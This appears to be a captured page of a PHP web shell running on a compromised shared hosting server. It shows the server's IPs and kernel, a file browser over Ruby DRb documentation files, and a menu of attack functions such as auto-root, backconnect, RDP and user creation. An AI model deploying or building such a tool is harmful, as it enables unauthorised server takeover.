Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
DRb /
[ HOME SHELL ]
Name
Size
Permission
Action
DRbArray
[ DIR ]
drwxr-xr-x
DRbBadScheme
[ DIR ]
drwxr-xr-x
DRbBadURI
[ DIR ]
drwxr-xr-x
DRbConn
[ DIR ]
drwxr-xr-x
DRbConnError
[ DIR ]
drwxr-xr-x
DRbError
[ DIR ]
drwxr-xr-x
DRbIdConv
[ DIR ]
drwxr-xr-x
DRbMessage
[ DIR ]
drwxr-xr-x
DRbObject
[ DIR ]
drwxr-xr-x
DRbObservable
[ DIR ]
drwxr-xr-x
DRbProtocol
[ DIR ]
drwxr-xr-x
DRbRemoteError
[ DIR ]
drwxr-xr-x
DRbSSLSocket
[ DIR ]
drwxr-xr-x
DRbServer
[ DIR ]
drwxr-xr-x
DRbServerNotFound
[ DIR ]
drwxr-xr-x
DRbTCPSocket
[ DIR ]
drwxr-xr-x
DRbUNIXSocket
[ DIR ]
drwxr-xr-x
DRbURIOption
[ DIR ]
drwxr-xr-x
DRbUndumped
[ DIR ]
drwxr-xr-x
DRbUnknown
[ DIR ]
drwxr-xr-x
DRbUnknownError
[ DIR ]
drwxr-xr-x
ExtServ
[ DIR ]
drwxr-xr-x
ExtServManager
[ DIR ]
drwxr-xr-x
GW
[ DIR ]
drwxr-xr-x
GWIdConv
[ DIR ]
drwxr-xr-x
TimerIdConv
[ DIR ]
drwxr-xr-x
cdesc-DRb.yaml
1.26
KB
-rw-r--r--
config-i.yaml
401
B
-rw-r--r--
current_server-i.yaml
641
B
-rw-r--r--
fetch_server-i.yaml
178
B
-rw-r--r--
front-i.yaml
369
B
-rw-r--r--
here%3f-i.yaml
254
B
-rw-r--r--
install_acl-i.yaml
301
B
-rw-r--r--
install_id_conv-i.yaml
322
B
-rw-r--r--
mutex-i.yaml
161
B
-rw-r--r--
regist_server-i.yaml
183
B
-rw-r--r--
remove_server-i.yaml
183
B
-rw-r--r--
start_service-i.yaml
880
B
-rw-r--r--
stop_service-i.yaml
376
B
-rw-r--r--
thread-i.yaml
344
B
-rw-r--r--
to_id-i.yaml
387
B
-rw-r--r--
to_obj-i.yaml
391
B
-rw-r--r--
uri-i.yaml
335
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : start_service-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Start a dRuby server locally. - !ruby/struct:SM::Flow::P body: The new dRuby server will become the primary server, even if another server is currently the primary server. - !ruby/struct:SM::Flow::P body: <tt>uri</tt> is the URI for the server to bind to. If nil, the server will bind to random port on the default local host name and use the default dRuby protocol. - !ruby/struct:SM::Flow::P body: <tt>front</tt> is the server's front object. This may be nil. - !ruby/struct:SM::Flow::P body: <tt>config</tt> is the configuration for the new server. This may be nil. - !ruby/struct:SM::Flow::P body: See DRbServer::new. full_name: DRb#start_service is_singleton: false name: start_service params: (uri=nil, front=nil, config=nil) visibility: public
Close